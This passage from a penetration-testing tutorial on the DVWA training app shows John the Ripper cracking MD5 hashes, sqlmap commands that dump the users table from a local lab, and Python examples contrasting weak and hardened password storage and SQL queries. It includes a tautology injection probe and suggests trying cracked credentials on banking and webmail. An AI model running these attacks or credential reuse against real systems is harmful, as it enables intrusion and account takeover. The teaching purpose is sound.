In a new terminal, browse to the John directory by executing the cd /pentest/passwords/john command. To run the password cracker on the input file we created, execute the following command.
./john --format=raw-MD5 dvwa_pw.txt --show
The --format flag specifies what type of password hashes are in the input file, and the --show flag displays the usernames and passwords that have been reliably cracked. The output from this command is shown below in the same username:password format that we used in the input file. As expected, all five passwords were successfully cracked.
admin:password
gordonb:abc123
1337:charley
pablo:letmein
smithy:password
With these credentials, you can now log into DVWA as any of these users. Go ahead and try it! The currently logged-in user is displayed in the lower left corner of the screen once you successfully log in to DVWA. Another potential use of these newly discovered credentials is that you can now use these usernames and passwords in other places. For example, it is common for a user to have the same username and password for a web application that they also use for webmail, online banking, and social networking. It's always a good idea to try these credentials to attempt to authenticate to any service that you find running.
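To make concrete why all five hashes fell so quickly, and what the application should have stored instead, here is an added Python example (not part of the original text, and not code from DVWA or John the Ripper). It parses a constructed username:hash file in the same format as dvwa_pw.txt, shows that a single MD5 computation per wordlist entry tests every user at once because the hashes are unsalted, and contrasts that with a salted, iterated PBKDF2-HMAC-SHA256 store where each user costs the attacker a separate pass. The hash file, wordlist and passphrase are constructed sample values.

```python
import hashlib
import hmac
import os

# Constructed input in the same username:hash format as dvwa_pw.txt.
# The first two digests are unsalted MD5 of "password" and "abc123";
# the third is built below from a long passphrase so it stays uncracked.
STRONG_PASSPHRASE = "correct-horse-battery-staple-2013"  # constructed
SAMPLE_HASHFILE = (
    "admin:5f4dcc3b5aa765d61d8327deb882cf99\n"
    "gordonb:e99a18c428cb38d5f260853678922e03\n"
    "1337:" + hashlib.md5(STRONG_PASSPHRASE.encode()).hexdigest() + "\n"
)

# Constructed toy wordlist standing in for john's default password list.
WORDLIST = ["123456", "password", "abc123", "letmein", "charley"]


def parse_hashfile(text):
    """Parse username:hexdigest lines into a dict; blank or malformed lines are skipped."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        user, digest = line.split(":", 1)
        entries[user] = digest.lower()
    return entries


def crack_raw_md5(entries, wordlist):
    """Raw, unsalted MD5: hashing each candidate once tests it against every user.

    Returns {username: recovered_password} for users whose digest matched.
    """
    lookup = {hashlib.md5(word.encode()).hexdigest(): word for word in wordlist}
    return {user: lookup[digest] for user, digest in entries.items() if digest in lookup}


def hash_password(password, salt=None, iterations=600_000):
    """Hardened storage: per-user random salt plus a slow, iterated KDF (PBKDF2-HMAC-SHA256)."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Recompute the KDF with the stored salt and compare in constant time."""
    _algo, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def hash_operations(num_users, num_words, salted):
    """Hash computations for one pass over the wordlist: unsalted digests are shared across users."""
    return num_words * (num_users if salted else 1)


if __name__ == "__main__":
    entries = parse_hashfile(SAMPLE_HASHFILE)
    print("recovered:", crack_raw_md5(entries, WORDLIST))
    print("raw MD5 work:", hash_operations(len(entries), len(WORDLIST), salted=False))
    print("salted KDF work:", hash_operations(len(entries), len(WORDLIST), salted=True))
    stored = hash_password("letmein")
    print("verify correct:", verify_password("letmein", stored))
    print("verify wrong:", verify_password("password", stored))
```

The two weak accounts are recovered by a five-word list, while the user whose passphrase is not in the list is not. The iteration count is the only tunable that makes the hardened store slower; the salt is what stops one computed digest from being reused against every account in the file.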
sqlmap
A really useful SQL injection command line tool is sqlmap, which was created by Bernardo Damele and Miroslav Stampar and can be downloaded from http://sqlmap.org. It is also included in the default install of BackTrack under the /pentest/database/sqlmap directory. sqlmap automates the process of detecting and exploiting SQL injection flaws and has an onboard detection engine and tons of options that allow a wide range of attacks to be executed against the web application.
You can actually complete all of the SQL injection attacks that we completed in the section above by using sqlmap and its available flags; some of the most useful flags include:
■ -u to specify the target URL of the vulnerable page.
■ --cookie to specify a valid session cookie to be passed to the application during the attack.
■ -b to retrieve the database's banner.
■ --current-db to retrieve the Database Management System's (DBMS) current database.
■ --current-user to retrieve the DBMS current user.
■ --string to provide a string value that is always present in the page, to help identify false positives.
■ --users to retrieve the database management system users.
■ --password to retrieve the database management password hashes for system users.
■ -U to specify which database management user to include in the attack.
■ --privileges to retrieve the selected user's privileges.
■ --dbs to retrieve the names of all databases on the database server.
■ -D to specify which database to target.
■ --tables to retrieve all tables in the targeted database.
■ -T to specify which table to target.
■ --columns to retrieve all columns in the targeted table.
■ -C to specify which columns to retrieve.
■ --dump to retrieve the contents of the targeted columns.
The two parameter values that we need in addition to these flags are the exact URL of the vulnerable page and a valid session identifier (cookie) value. We can easily retrieve those values from the raw tab in Burp Intercept. While the URL will be the same for each user, the session identifier that you use will be different, so please note your exact values. Ensure your proxy is configured to capture requests and browse back to the SQL Injection page on DVWA. After you enter any value (2 in our example) for the User ID, the values that we need to run sqlmap will be displayed in the raw tab as shown in Figure 4.9.
FIGURE 4.9 Raw request of SQL injectable page in DVWA.
There are two parameters in the Cookie header (PHPSESSID and security), and we will need to use both values in sqlmap. We also need to harvest the URL from the Referer header. To ensure you don't lose track of these values, open a new gedit file and paste them in, as we will be using the cookie values with the --cookie flag and the URL value with the -u flag in sqlmap. To open sqlmap, navigate to the appropriate directory by executing the cd /pentest/database/sqlmap command.
You can run sqlmap against our vulnerable page by executing the following command to retrieve the database banner and the name of the current database. Select y when you are prompted for additional testing.
./sqlmap.py -u "http://127.0.0.1/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=10tlrk8vql4s8kkqacneo55fq7; security=low" -b --current-db
The results, as expected, mirror what we found when we executed the SQL injections earlier, as shown in Figure 4.10. When prompted whether to find additional parameters, make sure to select no.
FIGURE 4.10 sqlmap results for database banner and database name.
To retrieve all tables in the dvwa database, as shown in Figure 4.11, run the following command.
./sqlmap.py -u "http://127.0.0.1/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="PHPSESSID=10tlrk8vql4s8kkqacneo55fq7; security=low" -D dvwa --tables
FIGURE 4.11 sqlmap results for tables in the "dvwa" database.
To retrieve the columns from the users table in the dvwa database, as shown in Figure 4.12, run the following command.
./sqlmap.py -u "http://127.0.0.1/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="PHPSESSID=10tlrk8vql4s8kkqacneo55fq7; security=low" -D dvwa -T users --columns
FIGURE 4.12 sqlmap results for columns in the "users" table in the "dvwa" database.
To retrieve all of the database users and cracked passwords, as shown in Figure 4.13, run the following command.
./sqlmap.py -u "http://127.0.0.1/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="PHPSESSID=10tlrk8vql4s8kkqacneo55fq7; security=low" -D dvwa -T users -C password,users,user_id --dump
FIGURE 4.13 sqlmap results for password cracking for all usernames in the "dvwa" database.
Alert
When prompted with "do you want sqlmap to consider provided column(s):", select 2 so that the column names are treated as exact, and accept the default dictionary for the attack.
The same exploit that took two different tools and six commands took just four commands in sqlmap. You can actually combine all the sqlmap flags into one command and do all this work at once!
./sqlmap.py -u "http://127.0.0.1/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=10tlrk8vql4s8kkqacneo55fq7; security=low" -b --current-db -D dvwa --tables -T users --columns -C user,password --dump
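Everything sqlmap did above rests on one defect in the page it was pointed at: the id parameter is pasted into the SQL text, so the database parses whatever the client sends. The following added Python example (not from the original text, DVWA or sqlmap) shows that pattern next to its fix. It builds a constructed in-memory SQLite table named users with the user_id, user and password columns referenced in the section (SQLite stands in for DVWA's MySQL; the third row's hash is a placeholder), runs the same lookup two ways, and feeds both a normal value and a classic tautology probe so the difference is visible in the returned rows.

```python
import sqlite3

# Constructed in-memory stand-in for DVWA's users table (columns named as in
# the section: user_id, user, password). The first two digests are the unsalted
# MD5 values recovered earlier; the third is a constructed placeholder.
SAMPLE_ROWS = [
    (1, "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "gordonb", "e99a18c428cb38d5f260853678922e03"),
    (3, "1337", "constructed-placeholder-hash"),
]


def make_db():
    """Create the sample table in a fresh in-memory SQLite database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER PRIMARY KEY, user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, user_id):
    """DVWA low-security pattern: the request parameter is pasted into the SQL text.

    Whatever the client sends is parsed as SQL; this is the flaw sqlmap detects
    by sending probe values and comparing the responses.
    """
    sql = f"SELECT user_id, user FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """Hardened form: validate the type, then bind the value as a parameter.

    The SQL text is fixed at development time; the value travels separately and
    can never change the statement's structure.
    """
    if not isinstance(user_id, str) or not user_id.isdigit():
        raise ValueError("user_id must be a non-negative integer string")
    return conn.execute(
        "SELECT user_id, user FROM users WHERE user_id = ?", (int(user_id),)
    ).fetchall()


def compare(user_id):
    """Run both lookups on the same input; return (vulnerable_rows, safe_result)."""
    conn = make_db()
    vulnerable = lookup_vulnerable(conn, user_id)
    try:
        safe = lookup_safe(conn, user_id)
    except ValueError as exc:
        safe = f"rejected: {exc}"
    conn.close()
    return vulnerable, safe


if __name__ == "__main__":
    # Constructed inputs: the normal value from the section and a tautology probe.
    for value in ["2", "2' OR '1'='1"]:
        print(repr(value), "->", compare(value))
```

With the normal value both versions return the single gordonb row. With the probe, the concatenated query returns every row because the injected OR rewrote the WHERE clause, while the parameterized version rejects the input before it reaches the database. Parameter binding is the fix; the type check in front of it is what keeps the probe out of the server logs and error pages that the first two exploitation approaches depend on.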
The three approaches just introduced for exploiting SQL injection vulnerabilities will serve you very well in the future as you discover, and want to exploit, SQL injection vulnerabilities.
1. Using verbose error messages to derive malicious input to be entered directly into the web application’s HTML form.
2. Using an intercepting proxy to edit the value of parameters being passed to the SQL interpreter.
3. Using an automated exploitation tool, such as sqlmap, to conduct SQL exploits.